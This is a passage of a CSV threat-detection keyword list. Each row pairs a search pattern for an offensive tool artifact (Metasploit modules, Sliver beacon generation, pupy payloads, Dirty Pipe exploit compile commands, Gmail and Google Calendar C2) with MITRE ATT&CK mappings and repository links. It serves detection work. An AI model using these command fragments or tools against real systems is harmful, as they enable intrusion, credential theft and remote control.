- TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_to_wordlist*",".{0,1000}gather\/enum_ad_to_wordlist.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_user_comments*",".{0,1000}gather\/enum_ad_user_comments.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_logged_on_users*",".{0,1000}gather\/enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_logged_on_users*",".{0,1000}gather\/enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_putty_saved_sessions*",".{0,1000}gather\/enum_putty_saved_sessions.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/keylogger*",".{0,1000}gather\/keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*gather/ldap_query*",".{0,1000}gather\/ldap_query.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*gather/peass.rb*",".{0,1000}gather\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*gather/user_hunter*",".{0,1000}gather\/user_hunter.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*gatherer/gatherer.py*",".{0,1000}gatherer\/gatherer\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*gato * attack*",".{0,1000}gato\s.{0,1000}\sattack.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*gato * enumerate*",".{0,1000}gato\s.{0,1000}\senumerate.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*gato * --http-proxy*",".{0,1000}gato\s.{0,1000}\s\-\-http\-proxy.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*gato * --socks-proxy*",".{0,1000}gato\s.{0,1000}\s\-\-socks\-proxy.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*gc2-sheet.go*",".{0,1000}gc2\-sheet\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*GC2-sheet/cmd*",".{0,1000}GC2\-sheet\/cmd.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*gcat*implant.py*",".{0,1000}gcat.{0,1000}implant\.py.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*gcat.is.the.shit@gmail.com*",".{0,1000}gcat\.is\.the\.shit\@gmail\.com.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*gcc cve_2022_0847.c -o exploit*",".{0,1000}gcc\scve_2022_0847\.c\s\-o\sexploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" "*gcc dirtypipez.c*",".{0,1000}gcc\sdirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*gconv-modules*",".{0,1000}gconv\-modules.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*gcp_functionalc2.profile*",".{0,1000}gcp_functionalc2\.profile.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*GCPBucketBrute*",".{0,1000}GCPBucketBrute.{0,1000}","offensive_tool_keyword","GCPBucketBrute","A script to enumerate Google Storage buckets. determine what access you have to them. and determine if they can be privilege escalated","T1083 - T1553 - T1210 - T1213","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs/GCPBucketBrute","1","0","N/A","N/A","5","447","85","2023-05-26T19:11:42Z","2019-02-26T03:56:22Z" "*GCR - Google Calendar RAT*",".{0,1000}GCR\s\-\sGoogle\sCalendar\sRAT.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*GCR-Google-Calendar-RAT*",".{0,1000}GCR\-Google\-Calendar\-RAT.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*geacon*/cmd/*",".{0,1000}geacon.{0,1000}\/cmd\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*geli2john.py*",".{0,1000}geli2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*gem 'evil-proxy'*",".{0,1000}gem\s\'evil\-proxy\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*gemailhack.py*",".{0,1000}gemailhack\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","10","929","368","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z" "*gen -f py bind --port*",".{0,1000}gen\s\-f\spy\sbind\s\-\-port.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*gen -f py_oneliner connect *",".{0,1000}gen\s\-f\spy_oneliner\sconnect\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*genCrossC2 *",".{0,1000}genCrossC2\s.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*genCrossC2.*",".{0,1000}genCrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*genCrossC2.Win.exe*",".{0,1000}genCrossC2\.Win\.exe.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*Generalrecon -noninteractive*",".{0,1000}Generalrecon\s\-noninteractive.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*generate beacon --mtls *",".{0,1000}generate\sbeacon\s\-\-mtls\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate exe Shadow*",".{0,1000}generate\sexe\sShadow.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*generate --http http*",".{0,1000}generate\s\-\-http\shttp.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate --mtls * --os windows *",".{0,1000}generate\s\-\-mtls\s.{0,1000}\s\-\-os\swindows\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate --mtls * --save *",".{0,1000}generate\s\-\-mtls\s.{0,1000}\s\-\-save\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate payload=*",".{0,1000}generate\spayload\=.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*generate --tcp-pivot *",".{0,1000}generate\s\-\-tcp\-pivot\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate/canaries.go*",".{0,1000}generate\/canaries\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate/implants.go*",".{0,1000}generate\/implants\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate_beacon*",".{0,1000}generate_beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" "*generate_beanshell1*",".{0,1000}generate_beanshell1.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_exploit_path_from_template(*",".{0,1000}generate_exploit_path_from_template\(.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*generate_exploit_path_from_template*",".{0,1000}generate_exploit_path_from_template.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*generate_golden_saml*",".{0,1000}generate_golden_saml.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*generate_hta operation1*",".{0,1000}generate_hta\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_jdk8u20*",".{0,1000}generate_jdk8u20.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_loader_cmd*",".{0,1000}generate_loader_cmd.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*generate_mozillarhino1*",".{0,1000}generate_mozillarhino1.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 